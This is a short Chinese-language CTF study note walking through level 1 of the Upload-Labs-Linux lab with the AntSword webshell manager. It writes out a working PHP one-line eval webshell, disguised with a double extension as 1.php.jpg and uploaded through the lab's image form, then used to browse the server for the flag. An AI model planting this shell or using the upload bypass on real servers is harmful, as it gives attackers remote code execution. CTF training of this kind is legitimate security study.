CTF学习笔记-Upload-Labs-Linux 1

此题使用一句话木马解题

题目如下:

https://r2.kwxos.pp.ua/change-hexo-img/f619b6b794d0932beccbbc0e43e2d38f.png
要求找出flag
题目说,解题方法多种多样,我就用网上常用的用蚁剑解决

解题准备:

1,首先下载蚁剑源码
源码地址:https://github.com/AntSwordProject/antSword
2,下载蚁剑加载器:
https://github.com/AntSwordProject/AntSword-Loader
两个压缩包解压到同目录下

https://r2.kwxos.pp.ua/change-hexo-img/128aa1262d75a69253018952344a6c12.png
点击打开加载器

https://r2.kwxos.pp.ua/change-hexo-img/8f71e73d4b7628c83ab1f2dacbd979fb.png
选择源码目录

https://r2.kwxos.pp.ua/change-hexo-img/d28970ddffbb674b66bf8a1f220e609c.png
按提示操作即可

解题:

在桌面或者磁盘里用记事本创建一个txt文件
复制以下内容到txt文件中

1
<?php @eval($_POST[123])?>

保存文件改名为 1.php.jpg
然后题目中上传此文件
上传成功后,会显示一个解码错误的图片,复制这图片地址,在蚁剑中点击添加数据
粘贴图片链接到url,密码就是123

添加成功后,打开链接,就会看见很多目录,
点击根目录\ 点击flag文件夹,就可以看到flag码

https://r2.kwxos.pp.ua/change-hexo-img/4ef7d3bde58395dd431ab089f29c58cd.png
非常的好用